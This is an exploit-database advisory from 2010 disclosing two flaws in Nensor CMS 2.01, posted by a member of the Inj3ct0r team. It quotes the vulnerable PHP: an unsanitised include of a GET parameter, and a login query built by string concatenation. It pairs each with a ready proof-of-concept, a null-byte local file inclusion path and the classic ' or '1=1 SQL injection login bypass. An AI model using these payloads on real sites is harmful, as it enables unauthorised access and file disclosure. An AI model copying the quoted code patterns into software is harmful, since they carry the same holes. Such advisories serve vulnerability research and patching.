nensor CMS 2.01 - Multiple Vulnerabilities

EDB-ID:

11806

CVE:



Author:

cr4wl3r

Type:

webapps


Platform:

PHP

Date:

2010-03-18


===============================================
Nensor CMS 2.01 Multiple Remote Vulnerabilities
===============================================

[+] Nensor CMS 2.01 Multiple Remote Vulnerabilities

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original : http://inj3ct0r.com/exploits/11346
[+] Download: http://code.google.com/p/nensor-cms/downloads/list

[x] LFI:

$sPage=(isset($_GET["page"]))?$_GET["page"]:"";

if(is_file("".$sPage.".php")){
 include "".$sPage.".php";
}elseif(is_file("".$sPage.".js")){
 include "".$sPage.".js";
}

[x] LFI PoC: [payh]/x/modules/javascript.php?sPage=[LFI%00]

[x] Auth Bypass:

$sql = "SELECT iKey,sUsername,iKeyGroup,bForumAdmin,sLanguage,sPassword,sMail,sType
    FROM tb_users
    WHERE sUsername='".strInput($_POST["sUsername"])."'
    AND sPassword='".md5($_POST["sPassword"])."'
    AND bActive=1";

[x] PoC: ' or '1=1


# Inj3ct0r.com [2010-03-18]